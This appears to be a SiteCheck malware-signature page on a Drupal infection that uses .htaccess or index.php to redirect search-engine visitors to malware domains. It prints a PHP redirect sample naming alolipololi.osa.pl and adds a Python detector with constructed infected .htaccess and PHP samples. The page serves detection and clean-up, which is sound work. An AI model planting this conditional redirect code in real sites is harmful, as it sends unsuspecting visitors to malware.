SiteCheck Signatures

malware-entry-mwhta9

Description:

This attack uses .htaccess to redirect users to a site serving malware (or spam). In some cases, PHP code is added to index.php to perform the redirection instead.

Loads malware from:

http://alolipololi.osa.pl
http://drivegup.tk
And other domains.

Affecting:

Drupal sites.

Clean up and details

Remove offending code from .htaccess and index.php.

Links:

http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html

Malware sample:

.. error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
  $referer=$_SERVER['HTTP_REFERER'];
  $ua=$_SERVER['HTTP_USER_AGENT'];
  if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
    if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
      header("Location: http://alolipololi.osa.pl/");
    }
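
The conditional redirect in the sample above can be searched for during clean-up. The following Python check is an added example, not SiteCheck's signature or Sucuri's code: it reports absolute redirect targets that sit behind a search-engine Referer test in index.php or .htaccess. The RewriteCond/RewriteRule layout used for the .htaccess variant and the redirect-target.example host are assumptions, since the page shows only the PHP form.

```python
import re

# Heuristic for the pattern this signature describes: a redirect that only
# fires when the Referer names a search engine (engine list from the sample).
ENGINES = r"(?:yahoo|google|bing)"
PHP_REFERER = re.compile(r"\$_SERVER\[\s*['\"]HTTP_REFERER['\"]\s*\]")
PHP_ENGINE_TEST = re.compile(r"(?:stristr|stripos|strpos|preg_match)\s*\([^)]*" + ENGINES, re.I)
PHP_REDIRECT = re.compile(r"header\(\s*['\"]Location:\s*(https?://[^'\"\s]+)", re.I)
HT_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+\S*" + ENGINES, re.I | re.M)
HT_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.I | re.M)


def scan(filename, text):
    """Return absolute redirect targets that sit behind a search-engine
    Referer test; an empty list means nothing matched."""
    if filename.endswith(".htaccess"):
        return HT_RULE.findall(text) if HT_COND.search(text) else []
    if PHP_REFERER.search(text) and PHP_ENGINE_TEST.search(text):
        return PHP_REDIRECT.findall(text)
    return []


# Constructed inputs. PHP_INFECTED is a shortened form of the page's sample;
# the .htaccess files and the .example host are made up for this example.
PHP_INFECTED = '''<?php error_reporting(0);
$referer=$_SERVER['HTTP_REFERER'];
if (stristr($referer,"yahoo") or stristr($referer,"google")) {
    header("Location: http://alolipololi.osa.pl/");
}'''
PHP_CLEAN = '''<?php
if ($_SERVER['HTTP_REFERER'] == "") { header("Location: /login"); }'''
HT_INFECTED = '''RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*
RewriteRule ^(.*)$ http://redirect-target.example/ [R=301,L]'''
HT_CLEAN = '''RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^ index.php [L]'''

if __name__ == "__main__":
    for name, body in [("index.php", PHP_INFECTED), ("index.php", PHP_CLEAN),
                       (".htaccess", HT_INFECTED), (".htaccess", HT_CLEAN)]:
        print(name, scan(name, body) or "no match")
```

A match is a lead for manual review, not proof of infection: compare the flagged file against a clean copy of the same Drupal release before removing anything.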